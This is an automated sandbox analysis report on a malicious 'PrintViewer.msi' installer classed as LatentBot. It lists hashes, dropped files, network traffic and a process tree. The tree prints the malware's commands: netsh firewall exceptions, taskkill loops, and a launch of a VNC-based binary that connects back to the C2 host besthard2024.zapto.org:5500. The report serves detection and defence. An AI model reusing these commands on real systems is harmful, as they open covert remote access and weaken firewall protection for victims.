Analysis

  • max time kernel
    148s
  • max time network
    147s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    30-09-2024 05:14

General

  • Target

    PrintViewer.msi

  • Size

    6.7MB

  • MD5

    85f914ec316e8d20e8e13ef3719e04e4

  • SHA1

    86ec276d409525bd8c1ef6d47ec8eece7639c0a2

  • SHA256

    00ceea629efd7eb1d9eee5706ce8089336259c099fc4af274baf857bd1ddf230

  • SHA512

    6a9eebfd6b4e794ab1fd949fa2093559460390a1d7843484e2086145e2ae968d8c347a3b3392aab2ebc41463cf97a3d36b23b6e8f80000949bb66c8eff3ba4e6

  • SSDEEP

    98304:57vB+ZHiEZJMuI9JqwLOO+lzsnMHDqqxLSd7qqXR2EkLus6elw5Xe21NtcP33h3u:5IiiJiTqwLOTsMHDHBAI8kcXvWP1u

Malware Config

Extracted

Family

latentbot

C2

besthard2024.zapto.org

Signatures

  • LatentBot

    Modular trojan written in Delphi which has been in-the-wild since 2013.

  • Blocklisted process makes network request 2 IoCs
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Drops file in Windows directory 10 IoCs
  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Delays execution with timeout.exe 11 IoCs
  • Disables Windows logging functionality 2 TTPs

    Changes registry settings to disable Windows Event logging.

  • Kills process with taskkill 3 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\PrintViewer.msi
    1⤵
    • Blocklisted process makes network request
    • Enumerates connected drives
    • Event Triggered Execution: Installer Packages
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:2408
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Blocklisted process makes network request
    • Enumerates connected drives
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2640
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding ADA8D974B6F80E4224326E81035663D4
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      PID:2516
    • C:\Windows\Installer\MSI98CF.tmp
      "C:\Windows\Installer\MSI98CF.tmp" /DontWait /HideWindow /dir "C:\Games\" "C:\Games\PrintDrivers.exe" /HideWindow "C:\Games\PrintDrivers.cmd"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:1556
  • C:\Games\PrintDrivers.exe
    "C:\Games\PrintDrivers.exe" /HideWindow "C:\Games\PrintDrivers.cmd"
    1⤵
    • Executes dropped EXE
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    PID:1148
  • C:\Windows\system32\cmd.exe
    cmd /c ""C:\Games\PrintDrivers.cmd" "
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1960
    • C:\Windows\system32\mode.com
      Mode 90,20
      2⤵
        PID:2100
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
        2⤵
          PID:480
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:780
          • C:\Windows\system32\reg.exe
            Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
            3⤵
              PID:592
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic process where (name="PrintDriver.exe") get commandline
            2⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1224
          • C:\Windows\system32\findstr.exe
            findstr /i "PrintDriver.exe"
            2⤵
              PID:1732
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" type C:\Games\PrintDriver.txt"
              2⤵
                PID:2336
              • C:\Windows\system32\cmd.exe
                cmd
                2⤵
                • Loads dropped DLL
                • Suspicious use of WriteProcessMemory
                PID:1708
                • C:\Windows\system32\mode.com
                  Mode 90,20
                  3⤵
                    PID:908
                  • C:\Windows\system32\netsh.exe
                    netsh firewall add allowedprogram program="C:\Games\PrintDriver.exe" name="MyApplication" mode=ENABLE scope=ALL
                    3⤵
                    • Modifies Windows Firewall
                    • Event Triggered Execution: Netsh Helper DLL
                    PID:1784
                  • C:\Windows\system32\netsh.exe
                    netsh firewall add allowedprogram program="C:\Games\PrintDriver.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALL
                    3⤵
                    • Modifies Windows Firewall
                    • Event Triggered Execution: Netsh Helper DLL
                    PID:1520
                  • C:\Windows\System32\Wbem\WMIC.exe
                    wmic process where (name="PrintDriver.exe") get commandline
                    3⤵
                      PID:2452
                    • C:\Windows\system32\findstr.exe
                      findstr /i "PrintDriver.exe"
                      3⤵
                        PID:1444
                      • C:\Games\PrintDriver.exe
                        C:\Games\PrintDriver.exe -autoreconnect ID:5654907 -connect besthard2024.zapto.org:5500 -run
                        3⤵
                        • Executes dropped EXE
                        • Suspicious use of FindShellTrayWindow
                        • Suspicious use of SendNotifyMessage
                        PID:2308
                    • C:\Windows\system32\timeout.exe
                      timeout /t 1
                      2⤵
                      • Delays execution with timeout.exe
                      PID:2692
                    • C:\Windows\system32\taskkill.exe
                      taskkill /im rundll32.exe /f
                      2⤵
                      • Kills process with taskkill
                      PID:1984
                    • C:\Windows\system32\timeout.exe
                      timeout /t 1
                      2⤵
                      • Delays execution with timeout.exe
                      PID:1936
                    • C:\Windows\system32\taskkill.exe
                      taskkill /im rundll32.exe /f
                      2⤵
                      • Kills process with taskkill
                      PID:2396
                    • C:\Windows\system32\timeout.exe
                      timeout /t 1
                      2⤵
                      • Delays execution with timeout.exe
                      PID:2016
                    • C:\Windows\system32\taskkill.exe
                      taskkill /im rundll32.exe /f
                      2⤵
                      • Kills process with taskkill
                      PID:1792
                    • C:\Games\PrintDrivers.exe
                      C:\Games\PrintDrivers.exe /HideWindow C:\Games\driverhelp.cmd
                      2⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                      PID:2180
                  • C:\Windows\system32\cmd.exe
                    cmd /c ""C:\Games\driverhelp.cmd" "
                    1⤵
                      PID:2888
                      • C:\Windows\system32\mode.com
                        Mode 90,20
                        2⤵
                          PID:2768
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
                          2⤵
                            PID:2716
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
                            2⤵
                              PID:2720
                              • C:\Windows\system32\reg.exe
                                Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
                                3⤵
                                  PID:3044
                              • C:\Windows\system32\timeout.exe
                                timeout /t 20
                                2⤵
                                • Delays execution with timeout.exe
                                PID:2900
                              • C:\Windows\system32\timeout.exe
                                timeout /t 20
                                2⤵
                                • Delays execution with timeout.exe
                                PID:2164
                              • C:\Windows\system32\timeout.exe
                                timeout /t 20
                                2⤵
                                • Delays execution with timeout.exe
                                PID:2924
                              • C:\Windows\system32\timeout.exe
                                timeout /t 20
                                2⤵
                                • Delays execution with timeout.exe
                                PID:1680
                              • C:\Windows\system32\timeout.exe
                                timeout /t 20
                                2⤵
                                • Delays execution with timeout.exe
                                PID:2868
                              • C:\Windows\system32\timeout.exe
                                timeout /t 20
                                2⤵
                                • Delays execution with timeout.exe
                                PID:812
                              • C:\Windows\system32\timeout.exe
                                timeout /t 20
                                2⤵
                                • Delays execution with timeout.exe
                                PID:1224
                              • C:\Windows\system32\timeout.exe
                                timeout /t 20
                                2⤵
                                • Delays execution with timeout.exe
                                PID:1856

                            Network

                            • flag-us
                              DNS
                              besthard2024.zapto.org
                              PrintDriver.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              besthard2024.zapto.org
                              IN A
                              Response
                              besthard2024.zapto.org
                              IN A
                              94.156.69.75
                            • 94.156.69.75:5500
                              besthard2024.zapto.org
                              PrintDriver.exe
                              1.1kB
                              820 B
                              18
                              16
                            • 127.0.0.1:5900
                              PrintDriver.exe
                            • 8.8.8.8:53
                              besthard2024.zapto.org
                              dns
                              PrintDriver.exe
                              68 B
                              84 B
                              1
                              1

                              DNS Request

                              besthard2024.zapto.org

                              DNS Response

                              94.156.69.75

                            MITRE ATT&CK Enterprise v15

                            Replay Monitor

                            Loading Replay Monitor...

                            Downloads

                            • C:\Config.Msi\f769477.rbs

                              Filesize

                              418KB

                              MD5

                              3ecf294845d5ae5b8306603ba36cb2aa

                              SHA1

                              859aae412a10427674364bd7858ff71ae4949292

                              SHA256

                              e3fc4f644a99902e59a0365749f4fc6edd36d98069abc650db5e252edd716099

                              SHA512

                              632bc982d12890539d8ac3bf6c46f8674ab57eded2e8d16d5521bf4dded360979297007aa61d4e3d9dafde76fa06bc8d361ee527c3d9276bea51e3b47c87beb8

                            • C:\Games\PrintDriver.exe

                              Filesize

                              2.8MB

                              MD5

                              27c1c264c6fce4a5f44419f1783db8e0

                              SHA1

                              e071486e4dfef3a13f958a252d7000d3ce7bfd89

                              SHA256

                              29379afd1ca5439c82931d623fda335174dc416e5b013591457fa1f7bbe564db

                              SHA512

                              a80a512be6f152e8737cd5d0a0a2a193eaf88f3bfb7ed6b7695d227e195db278e2734ebfc9fe48a68cfb13e4e5bb7fb4825019cfa2210ba741ecf8b11f954a98

                            • C:\Games\PrintDriver.txt

                              Filesize

                              1KB

                              MD5

                              6eb13f7936a83f4c44842029914aad6e

                              SHA1

                              7b9b27731d4ca6f996ce68c5d68b4d653e31d915

                              SHA256

                              8d9bb49947d9dc7fa7be7310149a99f13a0c02580fd996aae31c69d673775c49

                              SHA512

                              227788193867b2f99a62ae792d91562ad46ea3fa0855cf6ef28fc0de31d43f2e671c6ef50e534f0235f1f663769715bef162913a554e86e581fe05455373623e

                            • C:\Games\PrintDrivers.cmd

                              Filesize

                              1KB

                              MD5

                              eacc690f71a77685f030bef23b506b91

                              SHA1

                              03b911ba997d44028bf515ea44fe4813b4b4a785

                              SHA256

                              0f1d30740f2e46b22b86fb01acdabbd02440d7dbebe963a405fb3a5661b23263

                              SHA512

                              9870aa4dc699b74bfc8fb53df0c74686913f42ea2321bee39786e5be696fb081e3dfdac1b312f3c439c14e3061f35cefe820ef1ac5c853274ca0c867bf50a54d

                            • C:\Games\PrintDrivers.exe

                              Filesize

                              403KB

                              MD5

                              29ed7d64ce8003c0139cccb04d9af7f0

                              SHA1

                              8172071a639681934d3dc77189eb88a04c8bcfac

                              SHA256

                              e48aac5148b261371c714b9e00268809832e4f82d23748e44f5cfbbf20ca3d3f

                              SHA512

                              4bdd4bf57eaf0c9914e483e160182db7f2581b0e2adc133885bf0f364123d849d247d3f077a58d930e80502a7f27f1457f7e2502d466aec80a4fbeebd0b59415

                            • C:\Games\UltraVNC.ini

                              Filesize

                              1KB

                              MD5

                              b9dfbea744cc6c65473a97f2b959e44c

                              SHA1

                              c022f1d97fa56d61ad935aafa4e9e59e611e746a

                              SHA256

                              6f95a4eff9b0c2eaf37104b323d2b09c037aa7c3d472a1887c0f7914aa6c835d

                              SHA512

                              b92c8ea3583eb87f365b96cd45562cac2c4343e281c5090fc00db3f03bb5538a2d8aea3c39449d8d79cad31ed3692f6045266811d50fdd69807d8b12a9649eb5

                            • C:\Games\driverhelp.cmd

                              Filesize

                              870B

                              MD5

                              fd3b5847ddb8a31413951c0aa870ab95

                              SHA1

                              e3e91e3e9fa442cd1937422120de91da87973ddb

                              SHA256

                              e4f5e16dfe9bbe6d63f266103c35c0035a2d4014f516420190b7cfafb02b08ad

                              SHA512

                              5d8599f7d6f0824ab30118f5680bf89d28c1e7e9de4ed61af9074cb9d339619d59dab8e5818dc93dcf5b27ad9e8a863c5d082f8f829aa8c4a026ec5da2454096

                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                              Filesize

                              342B

                              MD5

                              0b247832df683c0af895edaf33cd9d35

                              SHA1

                              21c7e24b5058f3334f40cb1c657916b57e5c0e47

                              SHA256

                              e4edee729915142ab0fd4a4f9711a140fe2d40e47843043ecc39c977dd4bba49

                              SHA512

                              f252c81a96ad46f449794542bddd46ffeae225465c41365b3e9ad8c98115844aa3f041795515f24ebced83b39ffa03c056a9da57a0ef2603fb0c2b7633351cbc

                            • C:\Users\Admin\AppData\Local\Temp\Cab937B.tmp

                              Filesize

                              70KB

                              MD5

                              49aebf8cbd62d92ac215b2923fb1b9f5

                              SHA1

                              1723be06719828dda65ad804298d0431f6aff976

                              SHA256

                              b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

                              SHA512

                              bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

                            • C:\Users\Admin\AppData\Local\Temp\Tar939D.tmp

                              Filesize

                              181KB

                              MD5

                              4ea6026cf93ec6338144661bf1202cd1

                              SHA1

                              a1dec9044f750ad887935a01430bf49322fbdcb7

                              SHA256

                              8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

                              SHA512

                              6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

                            • C:\Windows\Installer\MSI968B.tmp

                              Filesize

                              936KB

                              MD5

                              13056f6fc48a93c1268d690e554f4571

                              SHA1

                              b83de3638e8551a315bb51703762a9820a7e0688

                              SHA256

                              aeda49baf2d79da2f7a9266f1fb7884111c2620e187090321f5278af5131c996

                              SHA512

                              ca828b4248e399178a8614f941332d159a30bad0156df0d5f4c4ca9d74d0ccb61fac59f34c945f5f914e22ec639bd97718f76d21b452825b07fe4041d1a44824

                            • C:\Windows\Installer\MSI98CF.tmp

                              Filesize

                              413KB

                              MD5

                              c8311ded7db427ce2c2879558ce8a8c1

                              SHA1

                              1895ce48297025dc005ebebc8256ac6d62013dec

                              SHA256

                              6fc76509f00c8ac81b597feeab520e684d190d831d828ca318d1e54afbf4a193

                              SHA512

                              d293885ef98f4e3fd9794500b8d560354cec3227916df05027f8c311076c60f11b6857e4e0ab0618f4d42da8141b42bcfb829a3a43b29a73ce0aa9967a80a232

                            • memory/1148-120-0x00000000000B0000-0x00000000000B2000-memory.dmp

                              Filesize

                              8KB

                            • memory/1556-118-0x0000000000120000-0x0000000000122000-memory.dmp

                              Filesize

                              8KB

                            • memory/1960-172-0x00000000024A0000-0x00000000024B0000-memory.dmp

                              Filesize

                              64KB

                            • memory/2180-187-0x00000000003E0000-0x00000000003E2000-memory.dmp

                              Filesize

                              8KB

                            We care about your privacy.

                            This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.